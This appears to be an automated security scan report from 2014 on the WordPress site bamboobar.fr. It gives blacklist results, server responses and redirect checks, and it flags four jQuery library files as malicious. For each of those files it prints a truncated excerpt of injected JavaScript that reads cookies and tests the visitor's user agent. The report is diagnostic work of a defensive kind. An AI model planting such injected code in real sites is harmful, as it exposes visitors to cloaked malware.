Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bamboobar.fr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bamboobar.fr/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bamboobar.fr/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 08 Sep 2014 01:28:33 GMT Location: http://www.bamboobar.fr/ Server: Apache Content-Encoding: none Content-Type: text/html; charset=UTF-8 Set-Cookie: clusterBAK=R1564868203; path=/; expires=Mon, 08-Sep-2014 02:48:37 GMT Set-Cookie: cluster=R2881418694; path=/; expires=Mon, 08-Sep-2014 02:44:00 GMT X-Pingback: http://www.bamboobar.fr/xmlrpc.php X-Powered-By: PHP/5.4.30 | clean |
http://www.bamboobar.fr/ | 200 OK Content-Length: 26707 Content-Type: text/html | clean |
http://www.bamboobar.fr/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 98686 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var kloack = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return kloack ? decodeURIComponent(kloack[1]) : undefined; } function Ubrostyleddesignercoder() { var specifico_stock = navigator.userAgent; var flawor_bobma = (specifico_stock.indexOf("IEMobile") > -1 || specifico_stock.indexOf("Chrome") > -1 || specifico_stock.indexOf("Windows") < jQuery.noConflict(); Antivirus reports:
| ||
http://www.bamboobar.fr/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 9484 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var kloack = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return kloack ? decodeURIComponent(kloack[1]) : undefined; } function Ubrostyleddesignercoder() { var specifico_stock = navigator.userAgent; var flawor_bobma = (specifico_stock.indexOf("IEMobile") > -1 || specifico_stock.indexOf("Chrome") > -1 || specifico_stock.indexOf("Windows") < Antivirus reports:
| ||
http://www.bamboobar.fr/wp-content/plugins/gallery-bank-pro-edition/assets/js/jquery.masonry.min.js?ver=3.9.2 | 200 OK Content-Length: 10193 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-content/plugins/gallery-bank-pro-edition/assets/js/isotope.pkgd.js?ver=3.9.2 | 200 OK Content-Length: 103229 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-content/plugins/gallery-bank-pro-edition/assets/js/imgLiquid.js?ver=3.9.2 | 200 OK Content-Length: 17950 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-content/plugins/gallery-bank-pro-edition/assets/js/jPages.js?ver=3.9.2 | 200 OK Content-Length: 23907 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-content/plugins/gallery-bank-pro-edition/assets/js/jquery.prettyPhoto.js?ver=3.9.2 | 200 OK Content-Length: 37319 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 6573 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var kloack = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return kloack ? decodeURIComponent(kloack[1]) : undefined; } function Ubrostyleddesignercoder() { var specifico_stock = navigator.userAgent; var flawor_bobma = (specifico_stock.indexOf("IEMobile") > -1 || specifico_stock.indexOf("Chrome") > -1 || specifico_stock.indexOf("Windows") < Antivirus reports:
| ||
http://www.bamboobar.fr/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js?ver=1.10.4 | 200 OK Content-Length: 38090 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var kloack = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return kloack ? decodeURIComponent(kloack[1]) : undefined; } function Ubrostyleddesignercoder() { var specifico_stock = navigator.userAgent; var flawor_bobma = (specifico_stock.indexOf("IEMobile") > -1 || specifico_stock.indexOf("Chrome") > -1 || specifico_stock.indexOf("Windows") < Antivirus reports:
| ||
http://www.bamboobar.fr/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.4 | 200 OK Content-Length: 8805 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-includes/js/jquery/ui/jquery.ui.mouse.min.js?ver=1.10.4 | 200 OK Content-Length: 5125 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-includes/js/jquery/ui/jquery.ui.button.min.js?ver=1.10.4 | 200 OK Content-Length: 9157 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-includes/js/jquery/ui/jquery.ui.position.min.js?ver=1.10.4 | 200 OK Content-Length: 8644 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-includes/js/jquery/ui/jquery.ui.sortable.min.js?ver=1.10.4 | 200 OK Content-Length: 26394 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bamboobar.fr
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 08 Sep 2014 01:28:33 GMT
Location: http://www.bamboobar.fr/
Server: Apache
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
Set-Cookie: clusterBAK=R1564868203; path=/; expires=Mon, 08-Sep-2014 02:48:37 GMT
Set-Cookie: cluster=R2881418694; path=/; expires=Mon, 08-Sep-2014 02:44:00 GMT
X-Pingback: http://www.bamboobar.fr/xmlrpc.php
X-Powered-By: PHP/5.4.30
GET / HTTP/1.1
Host: bamboobar.fr
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 08 Sep 2014 01:28:33 GMT
Location: http://www.bamboobar.fr/
Server: Apache
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
Set-Cookie: clusterBAK=R1564868203; path=/; expires=Mon, 08-Sep-2014 02:48:37 GMT
Set-Cookie: cluster=R2881418694; path=/; expires=Mon, 08-Sep-2014 02:44:00 GMT
X-Pingback: http://www.bamboobar.fr/xmlrpc.php
X-Powered-By: PHP/5.4.30
Second query (visit from search engine):
GET / HTTP/1.1
Host: bamboobar.fr
Referer: http://www.google.com/search?q=bamboobar.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bamboobar.fr
Referer: http://www.google.com/search?q=bamboobar.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.